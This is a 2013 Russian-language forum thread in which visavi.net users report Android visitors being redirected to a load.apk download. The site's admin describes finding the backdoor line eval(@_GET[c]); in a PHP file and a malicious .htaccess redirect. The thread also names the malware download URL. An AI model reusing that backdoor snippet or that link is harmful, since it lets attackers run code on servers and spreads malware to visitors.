Сайт, распространяет вирус!

1. Владислав (21.10.2013 / 13:29)
Последние версии FileZilla хранят пароль только во время сеанса.
Для повторных подключений, пароль нужно вводить заново.

2. markiz (21.10.2013 / 14:39)
Я ни хочу ни кого обвинять,вешать ярлыки и утверждать что ли бо.Сайт этот visavi.net.Ну например я досих пор не могу зайти на сайт с мини оперы,загружает какой то load.apk,объяснять что это наверное не надо все и так знают. Вопрос к администрации ...Что плохи дела совсем. или зловредный код?

Добавлено через 01:33 сек.
Скрин ¹

Добавлено через 02:26 сек.
Скрин2

3. Александр (21.10.2013 / 15:09)
вчера видел и сегодня было тоже.

4. Osharashen (21.10.2013 / 15:10)
да да было такое вчера

5. Quadratik (21.10.2013 / 15:13)
Вантуз обнищал) андрюшечий траф продает)

6. markiz (21.10.2013 / 15:21)
А мне думается кто то из админов.Доступ к редакции главной страницы,я больше чем уверен у них есть.А может и взломали Вантуза,ну или кого из подельников администрации.

7. Николай (21.10.2013 / 15:43)
Протестил, не поленился.
HTC Desire S
1 - Dolphin
2 - Opera Mobile
3 - Родной браузер
Названия бразуеров кликабельны.

8. Aid78 (21.10.2013 / 15:54)
Вот сегодня впервые увидел, с оперы мобайл и мини тоже, есть такое, с компа норм вот щас пишу

9. Антон (21.10.2013 / 16:07)
Тоже сегодня зашел с андрюши, инет мтс и меня постоянно перекидывает на http://file2ho.com/load/u/7499/load.auto

10. Вантуз-мен (21.10.2013 / 16:10)
есть подозрение на хостинг
сперва в одном php файле я увидел код eval(@_GET[c]); причем увидел сразу так как по какой-то причине был отрезан низ сайта, включил вывод ошибок и увидел

затем мне сказали что с андроида скачивает файл при входе я нашел в htaccess перенаправление на другой сайт для тех кто с андроида итд

убрал код, сегодня смотрю снова этот код появился

я думал может вирус подхватил бывает такой через ftp заходит, но нет вирусов нет, на других сайтах которые в ftp прописаны все нормально,

значит скорее всего через хостинг что-то делают

11. NicAn (21.10.2013 / 16:11)
а какой хостинг?

12. Вантуз-мен (21.10.2013 / 16:14)
10. NicAn, allhostings.ru

13. Евген (21.10.2013 / 16:14)
Ты не filezilla случаем юзаешь? А то через нее шляпа бывает. Сам мучился недели две

Добавлено через 00:44 сек.
Ищи во всех файлах и папках код вредоносный теперь

14. Александр (21.10.2013 / 16:20)
12. DezertiR, всегда ей пользуюсь и никогда нареканий небыло

15. Евген (21.10.2013 / 16:23)
Растоман, загугли для интереса. Она пассы хранит в хмл файле в открытом виде. Имеют ее часто и во все щели.

16. Quadratik (21.10.2013 / 16:38)
10. Vantuz, а в логах чё? ))

17. Вантуз-мен (21.10.2013 / 20:21)
16. Quadratik, ничего нет, наверно не через ftp

18. Михаил (21.10.2013 / 20:50)
админы сами лаве зарабатывают хостинга) сань бери впс и не парся, а еще логи посмотри на даты изменения на подключения.

19. Quadratik (21.10.2013 / 22:44)
Пора снова перекатываться))

20. Вантуз-мен (22.10.2013 / 00:28)
18. sh1z0fer, вчера как обычно зашел на сайт ночью, смотрю низ обрезан,
думаю что за фигня, включаю вывод ошибок нахожу файл там код eval(@_GET[c]); дата изменения 9 сентября
думаю если бы с того времени стоял код то ошибку бы раньше выдавало
да с хостингом точно что-то, пока у меня дела в реале делаю ремонт в квартире, даже на программирование нет времени, разберусь с ремонтом буду искать что-то другое

21. Александр (22.10.2013 / 08:15)
http://www.cy-pr.com/analysis/visavi.net
http://www.cy-pr.com/analysis/inwapik.ru - а вот у меня пишет хрень
McAfee SiteAdvisor: В ходе тестирования мы обнаружили, что незначительный процент загружаемых программ, представленных на данном веб-сайте, принадлежит к категории программ, которые некоторые пользователи считают шпионскими программами, программами для показа рекламы или другим нежелательным программным обеспечением.

URL: https://visavi.net/topics/39271